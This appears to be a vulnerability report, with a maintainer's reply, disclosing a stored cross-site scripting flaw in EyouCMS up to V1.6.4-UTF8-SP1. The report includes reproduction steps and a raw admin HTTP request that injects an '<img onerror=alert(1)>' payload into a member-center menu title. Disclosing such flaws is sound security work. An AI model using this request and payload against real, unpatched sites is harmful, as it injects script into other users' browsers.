EyouCMS-V1.6.4-UTF8-SP1 has a vulnerability, Stored Cross-Site Scripting

[DiliLearngent]

Version:
<=EyouCMS-V1.6.4-UTF8-SP1

Description:

1. Login to the back-end with an administrator account, click "Member Center", select "Function Configuration", then find "Frontend Style Settings", select "PC Left Menu", click "Manage" button, and modify the menu name.
   
   

   POST /EyouCMS/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1
   Host: 192.168.3.135
   Content-Length: 94
   Accept: application/json, text/javascript, */*; q=0.01
   X-Requested-With: XMLHttpRequest
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   Origin: http://192.168.3.135
   Referer: http://192.168.3.135/EyouCMS/login.php?m=admin&c=Member&a=ajax_menu_index&lang=cn
   Accept-Encoding: gzip, deflate
   Accept-Language: zh-CN,zh;q=0.9
   Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=1mvmqpf2r3tteku8fbf3bu1to6; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=users_index%7CMember
   Connection: close
   
   table=users_menu&id_name=id&id_value=11&field=title&value=<img src=1 onerror=alert(1)>
   

2. Register an account in the front-end and log in, click on "Avatar" and select "Personal Center", then a pop-up window will appear.
   

[weng-xianhu]

Thank you for your feedback. It has been fixed and the next version will be released.